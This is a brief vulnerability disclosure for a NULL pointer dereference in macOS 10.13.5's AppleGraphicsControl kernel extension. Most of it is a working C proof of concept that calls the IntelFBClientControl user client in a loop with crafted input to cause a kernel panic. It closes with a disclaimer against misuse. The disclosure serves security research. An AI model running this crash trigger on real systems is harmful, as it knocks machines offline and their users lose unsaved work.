NO01: AppleGraphicsControl, NULL Page Reference
Description
This case is of type NULL Pointer Deference. Not accepted by apple as vulnerability any more.
Environment
- OS: macOS 10.13.5
- Module: AppleGraphicsControl.kext
PoC
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
void trigger(io_connect_t conn, uint32_t value)
{
uint64_t INPUTSCALAR[8];
uint32_t INPUTSCALARCNT = 0;
char INPUTSTRUCT[4096];
size_t INPUTSTRUCTCNT = 0X1000;
uint64_t OUTPUTSCALAR[8] = {0};
uint32_t OUTPUTSCALARCNT = 0;
char OUTPUTSTRUCT[4096];
size_t OUTPUTSTRUCTCNT = 0X1000;
//FILL INPUT
for (int i=0; i<1024; i++) {
INPUTSCALAR[0] = value;
INPUTSCALARCNT = 1;
OUTPUTSCALARCNT = 1;
INPUTSTRUCTCNT = 29;
OUTPUTSTRUCTCNT = 0;
printf("i=%d\n", i);
*(uint32_t*)INPUTSTRUCT = i;
*(uint32_t*)&INPUTSTRUCT[4] = 1;
IOConnectCallMethod(
conn,
0x4108,
INPUTSCALAR,
INPUTSCALARCNT,
INPUTSTRUCT,
INPUTSTRUCTCNT,
OUTPUTSCALAR,
&OUTPUTSCALARCNT,
OUTPUTSTRUCT,
&OUTPUTSTRUCTCNT);
}
}
int main(){
kern_return_t err;
CFMutableDictionaryRef Matching = IOServiceMatching("IntelFBClientControl");
if(!Matching){
printf("UNABLE TO CREATE SERVICE MATCHING DICTIONARY\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, Matching, &iterator);
if (err != KERN_SUCCESS){
printf("NO MATCHES\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("UNABLE TO FIND SERVICE\n");
return 0;
}
io_connect_t CONN = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &CONN);
if (err != KERN_SUCCESS){
printf("UNABLE TO GET USER CLIENT CONNECTION\n");
return 0;
}else{
printf("GOT USERCLIENT CONNECTION: %X, TYPE:%D\n", CONN, 0);
}
trigger(CONN, 0x4118);
printf("PANIC?\n");
return 0;
}
Disclaimer
Since this type case is not vulnerability, the vendor(apple) may not fix it. Please don’t use this PoC code to do any malicious things. Just for fun.